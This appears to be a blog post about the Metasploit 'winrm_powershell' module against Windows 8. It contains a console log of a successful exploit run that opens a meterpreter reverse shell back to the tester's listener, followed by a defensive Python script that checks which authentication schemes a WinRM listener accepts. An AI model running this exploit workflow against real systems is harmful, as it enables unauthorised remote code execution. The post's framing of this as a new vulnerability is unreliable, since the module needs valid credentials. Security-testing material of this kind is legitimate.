
Windows 8 Vulnerability

Windows 8 "winrm_powershell" vulnerability

I really can't wait for this new vulnerability for Windows 8; it is possibly a critical issue for Microsoft to fix. Currently the Metasploit exploit is still not available for me to test. Hopefully it will arrive soon so I can test it!

msf  exploit(winrm_powershell) > show options

Module options (exploit/windows/winrm/winrm_powershell):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN    WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD  omfg             no        A specific password to authenticate with
   Proxies                    no        Use a proxy chain
   RHOST     10.6.255.158     yes       The target address
   RPORT     5985             yes       The target port
   URI       /wsman           yes       The URI of the WinRM service
   USERNAME  sinn3r           no        A specific username to authenticate as
   VHOST                      no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     10.6.255.84      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf  exploit(winrm_powershell) > rexploit
[*] Reloading module...
[*] Started reverse handler on 10.6.255.84:4444
[*] Attempting to set Execution Policy
[*] Grabbing %TEMP%
[*] uploading powershell script to C:\Users\sinn3r\AppData\Local\Temp\uUIpRDrz.ps1
[*] Attempting to execute script...
[*] Sending stage (752128 bytes) to 10.6.255.158
[*] Meterpreter session 1 opened (10.6.255.84:4444 -> 10.6.255.158:49535) at 2012-10-31 17:09:00 -0500
meterpreter >
[*] Session ID 1 (10.6.255.84:4444 -> 10.6.255.158:49535) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: powershell.exe (2844)
[+] Migrating to 696
[+] Successfully migrated to process
meterpreter > sysinfo
Computer        : WIN-VFQHRRTCA39
OS              : Windows 8 (Build 9200).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
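The module options above take a USERNAME and PASSWORD and talk to the WinRM listener on port 5985 at /wsman, so the first thing to check on a box you own or are testing is whether that listener is reachable at all and which authentication schemes it advertises to an unauthenticated client. The script below is an added example written for this post; it is not part of the original post and not Metasploit code. It sends a WS-Management Identify request with no credentials and reads the WWW-Authenticate headers from the 401 reply, which is the same idea as the Metasploit winrm_auth_methods scanner. The response used in the sample is constructed for illustration: a stock WinRM service advertises Negotiate and Kerberos, and Basic only shows up if an administrator has turned it on, which matters because Basic over plain HTTP on 5985 sends the password in the clear. The probe() function needs network access to a real host; the rest runs offline.

```python
"""
Unauthenticated WinRM exposure check.

POST a WS-Management Identify request to /wsman with no credentials and
classify the reply: a 401 carrying WWW-Authenticate headers means WinRM is
listening, and the header values tell you which schemes it will accept.

Added example for this post; not from the original post or from Metasploit.
"""
import http.client
import re

# WinRM defaults, the same values the module options above use.
DEFAULT_PORT = 5985
DEFAULT_URI = "/wsman"

# Minimal WS-Man Identify body. Without an Authorization header the service
# answers 401 before it looks at the body, which is all this check needs.
IDENTIFY_BODY = (
    '<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" '
    'xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd">'
    '<s:Header/><s:Body><wsmid:Identify/></s:Body></s:Envelope>'
)

# Schemes worth flagging: Basic on plain HTTP sends the password in the clear.
WEAK_SCHEMES = {"basic"}


def parse_auth_schemes(headers):
    """Return lower-cased scheme names from a list of (name, value) headers.

    WinRM sends one WWW-Authenticate header per scheme, e.g.
    'Negotiate', 'Kerberos', 'Basic realm="WSMAN"'.
    """
    schemes = []
    for name, value in headers:
        if name.lower() != "www-authenticate":
            continue
        # The scheme is the first token before any space or comma.
        m = re.match(r"\s*([A-Za-z][A-Za-z0-9_-]*)", value)
        if m:
            scheme = m.group(1).lower()
            if scheme not in schemes:
                schemes.append(scheme)
    return schemes


def classify(status, headers):
    """Summarise an unauthenticated reply from /wsman as a dict."""
    schemes = parse_auth_schemes(headers)
    if status == 401 and schemes:
        return {
            "winrm": True,
            "schemes": schemes,
            "weak": sorted(s for s in schemes if s in WEAK_SCHEMES),
        }
    # Anything else: closed port, other service, or a reverse proxy in the way.
    return {"winrm": False, "schemes": schemes, "weak": []}


def probe(host, port=DEFAULT_PORT, uri=DEFAULT_URI, timeout=5.0):
    """Live check against a real host (needs network); returns classify()'s dict."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request(
            "POST", uri, body=IDENTIFY_BODY,
            headers={"Content-Type": "application/soap+xml;charset=UTF-8"},
        )
        resp = conn.getresponse()
        return classify(resp.status, resp.getheaders())
    except (OSError, http.client.HTTPException) as exc:
        return {"winrm": False, "schemes": [], "weak": [], "error": str(exc)}
    finally:
        conn.close()


# Constructed sample reply from a listener on which Basic has been enabled
# (not the Windows default). Status and headers only; values are illustrative.
SAMPLE_STATUS = 401
SAMPLE_HEADERS = [
    ("Server", "Microsoft-HTTPAPI/2.0"),
    ("WWW-Authenticate", "Negotiate"),
    ("WWW-Authenticate", "Kerberos"),
    ("WWW-Authenticate", 'Basic realm="WSMAN"'),
    ("Content-Length", "0"),
]

if __name__ == "__main__":
    print(classify(SAMPLE_STATUS, SAMPLE_HEADERS))
    # For a real target: print(probe("10.6.255.158"))
```

If the probe reports only Negotiate and Kerberos, the module above still works once it has a valid account, so the finding to write up is WinRM reachable from an untrusted network, not a weak scheme. If Basic shows up on 5985, also note that credentials cross the wire unencrypted; the HTTPS listener is on 5986.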
